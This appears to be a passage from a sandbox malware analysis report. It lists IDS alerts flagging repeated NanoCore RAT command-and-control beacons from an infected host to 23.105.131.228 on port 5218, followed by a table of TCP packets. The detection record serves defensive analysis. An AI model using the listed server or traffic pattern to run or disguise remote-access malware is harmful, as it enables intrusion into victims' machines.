                                                                                      192.168.11.2023.105.131.2284984352182816718 05/26/22-23:02:15.749636TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon498435218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985852182816766 05/26/22-23:03:28.855065TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498585218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984552182816766 05/26/22-23:02:28.261536TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498455218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985552182816766 05/26/22-23:03:10.672551TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498555218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980852182816766 05/26/22-22:58:52.132477TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498085218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981252182816766 05/26/22-22:59:17.847332TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498125218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983552182816766 05/26/22-23:01:32.797260TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498355218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980252182816766 05/26/22-22:58:21.911604TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498025218192.168.11.2023.105.131.228
                                                                                      23.105.131.228192.168.11.205218498532810290 05/26/22-23:02:57.070574TCP2810290ETPRO TROJAN NanoCore RAT Keepalive Response 152184985323.105.131.228192.168.11.20
                                                                                      192.168.11.2023.105.131.2284982852182816766 05/26/22-23:00:49.935151TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498285218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983852182816766 05/26/22-23:01:51.496168TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498385218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985952182816718 05/26/22-23:03:34.321491TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon498595218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979952182816766 05/26/22-22:58:04.753817TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497995218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984552182025019 05/26/22-23:02:26.487154TCP2025019ET TROJAN Possible NanoCore C2 60B498455218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984852182025019 05/26/22-23:02:44.373603TCP2025019ET TROJAN Possible NanoCore C2 60B498485218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985852182025019 05/26/22-23:03:27.284937TCP2025019ET TROJAN Possible NanoCore C2 60B498585218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979252182816766 05/26/22-22:57:44.769854TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497925218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985552182025019 05/26/22-23:03:08.914161TCP2025019ET TROJAN Possible NanoCore C2 60B498555218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978252182816766 05/26/22-22:56:53.274979TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497825218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982852182025019 05/26/22-23:00:48.235087TCP2025019ET TROJAN Possible NanoCore C2 60B498285218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983852182025019 05/26/22-23:01:49.783134TCP2025019ET TROJAN Possible NanoCore C2 60B498385218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284977552182025019 05/26/22-22:56:38.901418TCP2025019ET TROJAN Possible NanoCore C2 60B497755218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986552182025019 05/26/22-23:04:10.629863TCP2025019ET TROJAN Possible NanoCore C2 60B498655218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983252182816766 05/26/22-23:01:14.490168TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498325218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985252182816766 05/26/22-23:02:52.215713TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498525218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979052182816766 05/26/22-22:57:32.337282TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497905218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980852182025019 05/26/22-22:58:50.992423TCP2025019ET TROJAN Possible NanoCore C2 60B498085218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985752182025019 05/26/22-23:03:21.170637TCP2025019ET TROJAN Possible NanoCore C2 60B498575218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982252182816766 05/26/22-23:00:13.070615TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498225218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986252182816766 05/26/22-23:03:53.418371TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498625218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984752182025019 05/26/22-23:02:38.235595TCP2025019ET TROJAN Possible NanoCore C2 60B498475218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982752182025019 05/26/22-23:00:42.060298TCP2025019ET TROJAN Possible NanoCore C2 60B498275218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983752182025019 05/26/22-23:01:43.592376TCP2025019ET TROJAN Possible NanoCore C2 60B498375218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284976952182816766 05/26/22-22:56:27.805928TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497695218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984252182816766 05/26/22-23:02:09.830094TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498425218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978352182816718 05/26/22-22:56:58.156949TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon497835218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986452182816766 05/26/22-23:04:05.819303TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498645218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978352182025019 05/26/22-22:56:57.850644TCP2025019ET TROJAN Possible NanoCore C2 60B497835218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978052182816766 05/26/22-22:56:46.808015TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497805218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982452182816766 05/26/22-23:00:25.238881TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498245218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981452182816766 05/26/22-22:59:29.900867TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498145218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982952182816766 05/26/22-23:00:56.084760TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498295218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983452182816766 05/26/22-23:01:26.679844TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498345218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978052182025019 05/26/22-22:56:45.202082TCP2025019ET TROJAN Possible NanoCore C2 60B497805218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981952182816766 05/26/22-22:59:54.510819TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498195218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985752182816766 05/26/22-23:03:22.706542TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498575218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979052182025019 05/26/22-22:57:30.455323TCP2025019ET TROJAN Possible NanoCore C2 60B497905218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980952182816766 05/26/22-22:58:58.970372TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498095218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985452182816766 05/26/22-23:03:04.405194TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498545218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984452182816766 05/26/22-23:02:22.023762TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498445218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980252182816718 05/26/22-22:58:21.911604TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon498025218192.168.11.2023.105.131.228
                                                                                      23.105.131.228192.168.11.205218497882810290 05/26/22-22:57:25.234060TCP2810290ETPRO TROJAN NanoCore RAT Keepalive Response 152184978823.105.131.228192.168.11.20
                                                                                      192.168.11.2023.105.131.2284979152182025019 05/26/22-22:57:36.817105TCP2025019ET TROJAN Possible NanoCore C2 60B497915218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985652182816766 05/26/22-23:03:16.808039TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498565218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981752182816766 05/26/22-22:59:48.482502TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498175218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982752182816766 05/26/22-23:00:43.669560TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498275218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984752182816766 05/26/22-23:02:39.985491TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498475218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983752182816766 05/26/22-23:01:45.080902TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498375218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284977152182025019 05/26/22-22:56:32.568998TCP2025019ET TROJAN Possible NanoCore C2 60B497715218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980652182816766 05/26/22-22:58:40.386913TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498065218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978252182025019 05/26/22-22:56:51.581864TCP2025019ET TROJAN Possible NanoCore C2 60B497825218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981652182816766 05/26/22-22:59:42.426003TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498165218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986552182816766 05/26/22-23:04:10.953670TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498655218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979252182025019 05/26/22-22:57:43.061898TCP2025019ET TROJAN Possible NanoCore C2 60B497925218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983652182816766 05/26/22-23:01:38.486462TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498365218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982652182816766 05/26/22-23:00:37.718065TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498265218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984652182816766 05/26/22-23:02:33.763111TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498465218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980752182816766 05/26/22-22:58:46.392335TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498075218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985352182025019 05/26/22-23:02:56.695701TCP2025019ET TROJAN Possible NanoCore C2 60B498535218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978452182816766 05/26/22-22:57:05.959460TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497845218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986352182025019 05/26/22-23:03:58.052969TCP2025019ET TROJAN Possible NanoCore C2 60B498635218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981052182025019 05/26/22-22:59:03.494428TCP2025019ET TROJAN Possible NanoCore C2 60B498105218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982052182025019 05/26/22-22:59:59.112186TCP2025019ET TROJAN Possible NanoCore C2 60B498205218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979752182816766 05/26/22-22:57:58.434919TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497975218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981352182025019 05/26/22-22:59:22.171911TCP2025019ET TROJAN Possible NanoCore C2 60B498135218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984652182025019 05/26/22-23:02:32.786547TCP2025019ET TROJAN Possible NanoCore C2 60B498465218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983052182025019 05/26/22-23:01:00.431074TCP2025019ET TROJAN Possible NanoCore C2 60B498305218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980352182025019 05/26/22-22:58:26.260383TCP2025019ET TROJAN Possible NanoCore C2 60B498035218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984052182025019 05/26/22-23:02:02.026018TCP2025019ET TROJAN Possible NanoCore C2 60B498405218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983652182025019 05/26/22-23:01:37.235701TCP2025019ET TROJAN Possible NanoCore C2 60B498365218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985952182025019 05/26/22-23:03:33.430761TCP2025019ET TROJAN Possible NanoCore C2 60B498595218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979752182025019 05/26/22-22:57:56.674729TCP2025019ET TROJAN Possible NanoCore C2 60B497975218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980652182025019 05/26/22-22:58:38.629823TCP2025019ET TROJAN Possible NanoCore C2 60B498065218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982652182025019 05/26/22-23:00:35.948670TCP2025019ET TROJAN Possible NanoCore C2 60B498265218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978752182816766 05/26/22-22:57:19.771138TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497875218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986052182025019 05/26/22-23:03:39.544308TCP2025019ET TROJAN Possible NanoCore C2 60B498605218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986052182816766 05/26/22-23:03:41.176317TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498605218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978752182025019 05/26/22-22:57:17.891220TCP2025019ET TROJAN Possible NanoCore C2 60B497875218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981652182025019 05/26/22-22:59:40.683320TCP2025019ET TROJAN Possible NanoCore C2 60B498165218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983052182816766 05/26/22-23:01:02.224827TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498305218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978452182025019 05/26/22-22:57:04.272476TCP2025019ET TROJAN Possible NanoCore C2 60B497845218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981952182025019 05/26/22-22:59:53.028818TCP2025019ET TROJAN Possible NanoCore C2 60B498195218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982952182025019 05/26/22-23:00:54.368958TCP2025019ET TROJAN Possible NanoCore C2 60B498295218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983952182025019 05/26/22-23:01:55.905807TCP2025019ET TROJAN Possible NanoCore C2 60B498395218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984052182816766 05/26/22-23:02:03.691808TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498405218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983352182816766 05/26/22-23:01:20.521033TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498335218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983552182816718 05/26/22-23:01:32.044894TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon498355218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981352182816766 05/26/22-22:59:23.359150TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498135218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985352182816766 05/26/22-23:02:58.303798TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498535218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980952182025019 05/26/22-22:58:57.214975TCP2025019ET TROJAN Possible NanoCore C2 60B498095218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982352182816766 05/26/22-23:00:19.115887TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498235218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986352182816766 05/26/22-23:03:59.744768TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498635218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980452182816766 05/26/22-22:58:33.462147TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498045218192.168.11.2023.105.131.228
                                                                                      23.105.131.228192.168.11.205218498012841753 05/26/22-22:58:15.567728TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)52184980123.105.131.228192.168.11.20
                                                                                      192.168.11.2023.105.131.2284984352182816766 05/26/22-23:02:16.034084TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498435218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983952182816766 05/26/22-23:01:57.503381TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498395218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985952182816766 05/26/22-23:03:34.975066TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498595218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985652182025019 05/26/22-23:03:15.071719TCP2025019ET TROJAN Possible NanoCore C2 60B498565218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979152182816766 05/26/22-22:57:38.723479TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497915218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284977152182816766 05/26/22-22:56:32.900519TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497715218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980352182816766 05/26/22-22:58:28.062184TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498035218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980052182025019 05/26/22-22:58:09.059966TCP2025019ET TROJAN Possible NanoCore C2 60B498005218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980752182025019 05/26/22-22:58:44.885942TCP2025019ET TROJAN Possible NanoCore C2 60B498075218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986152182816766 05/26/22-23:03:47.300693TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498615218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979652182025019 05/26/22-22:57:49.469914TCP2025019ET TROJAN Possible NanoCore C2 60B497965218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981752182025019 05/26/22-22:59:46.862759TCP2025019ET TROJAN Possible NanoCore C2 60B498175218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978652182025019 05/26/22-22:57:10.680744TCP2025019ET TROJAN Possible NanoCore C2 60B497865218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978852182816766 05/26/22-22:57:25.903337TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497885218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983152182816766 05/26/22-23:01:08.320653TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498315218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284976852182816766 05/26/22-22:56:20.953682TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497685218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284976952182025019 05/26/22-22:56:26.199314TCP2025019ET TROJAN Possible NanoCore C2 60B497695218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983452182025019 05/26/22-23:01:24.979877TCP2025019ET TROJAN Possible NanoCore C2 60B498345218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980152182025019 05/26/22-22:58:15.250696TCP2025019ET TROJAN Possible NanoCore C2 60B498015218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984452182025019 05/26/22-23:02:20.370858TCP2025019ET TROJAN Possible NanoCore C2 60B498445218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981152182025019 05/26/22-22:59:09.758921TCP2025019ET TROJAN Possible NanoCore C2 60B498115218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982152182025019 05/26/22-23:00:05.205755TCP2025019ET TROJAN Possible NanoCore C2 60B498215218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986452182025019 05/26/22-23:04:04.336780TCP2025019ET TROJAN Possible NanoCore C2 60B498645218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985452182025019 05/26/22-23:03:02.819470TCP2025019ET TROJAN Possible NanoCore C2 60B498545218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982152182816766 05/26/22-23:00:06.968002TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498215218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981152182816766 05/26/22-22:59:11.357229TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498115218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983152182025019 05/26/22-23:01:06.610183TCP2025019ET TROJAN Possible NanoCore C2 60B498315218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978352182816766 05/26/22-22:56:59.419988TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497835218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980152182816766 05/26/22-22:58:15.568079TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498015218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980252182025019 05/26/22-22:58:20.166592TCP2025019ET TROJAN Possible NanoCore C2 60B498025218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983552182025019 05/26/22-23:01:31.090286TCP2025019ET TROJAN Possible NanoCore C2 60B498355218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284976852182025019 05/26/22-22:56:19.837362TCP2025019ET TROJAN Possible NanoCore C2 60B497685218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982552182025019 05/26/22-23:00:29.822547TCP2025019ET TROJAN Possible NanoCore C2 60B498255218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978852182025019 05/26/22-22:57:24.224475TCP2025019ET TROJAN Possible NanoCore C2 60B497885218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986152182025019 05/26/22-23:03:45.715402TCP2025019ET TROJAN Possible NanoCore C2 60B498615218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284978652182816766 05/26/22-22:57:12.301059TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497865218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979652182816766 05/26/22-22:57:51.224317TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497965218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981252182025019 05/26/22-22:59:16.016167TCP2025019ET TROJAN Possible NanoCore C2 60B498125218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982052182816766 05/26/22-23:00:00.809134TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498205218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981552182025019 05/26/22-22:59:34.423976TCP2025019ET TROJAN Possible NanoCore C2 60B498155218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982252182025019 05/26/22-23:00:11.334940TCP2025019ET TROJAN Possible NanoCore C2 60B498225218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284983252182025019 05/26/22-23:01:12.735332TCP2025019ET TROJAN Possible NanoCore C2 60B498325218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981052182816766 05/26/22-22:59:05.241226TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498105218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984252182025019 05/26/22-23:02:08.123445TCP2025019ET TROJAN Possible NanoCore C2 60B498425218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980052182816766 05/26/22-22:58:10.847781TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498005218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284986252182025019 05/26/22-23:03:51.787396TCP2025019ET TROJAN Possible NanoCore C2 60B498625218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982452182025019 05/26/22-23:00:23.686878TCP2025019ET TROJAN Possible NanoCore C2 60B498245218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284985252182025019 05/26/22-23:02:50.506570TCP2025019ET TROJAN Possible NanoCore C2 60B498525218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284981452182025019 05/26/22-22:59:28.246171TCP2025019ET TROJAN Possible NanoCore C2 60B498145218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284980452182025019 05/26/22-22:58:32.441375TCP2025019ET TROJAN Possible NanoCore C2 60B498045218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284979952182025019 05/26/22-22:58:02.999718TCP2025019ET TROJAN Possible NanoCore C2 60B497995218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284982352182025019 05/26/22-23:00:17.588964TCP2025019ET TROJAN Possible NanoCore C2 60B498235218192.168.11.2023.105.131.228
                                                                                      23.105.131.228192.168.11.205218498292810290 05/26/22-23:00:54.737638TCP2810290ETPRO TROJAN NanoCore RAT Keepalive Response 152184982923.105.131.228192.168.11.20
                                                                                      192.168.11.2023.105.131.2284983352182025019 05/26/22-23:01:18.862946TCP2025019ET TROJAN Possible NanoCore C2 60B498335218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284984352182025019 05/26/22-23:02:14.277580TCP2025019ET TROJAN Possible NanoCore C2 60B498435218192.168.11.2023.105.131.228
                                                                                      192.168.11.2023.105.131.2284977552182816766 05/26/22-22:56:40.578439TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497755218192.168.11.2023.105.131.228
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 26, 2022 22:56:17.960925102 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:17.961008072 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:17.961203098 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:17.987721920 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:17.987776995 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.031034946 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.031286001 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.031356096 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.145823002 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.145880938 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.146599054 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.146783113 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.155292034 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.195065022 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.195223093 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.195267916 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.195489883 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.195522070 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.195671082 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.195700884 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.195925951 CEST49767443192.168.11.20162.159.129.233
                                                                                      May 26, 2022 22:56:18.195975065 CEST44349767162.159.129.233192.168.11.20
                                                                                      May 26, 2022 22:56:18.196182013 CEST44349767162.159.129.233192.168.11.20
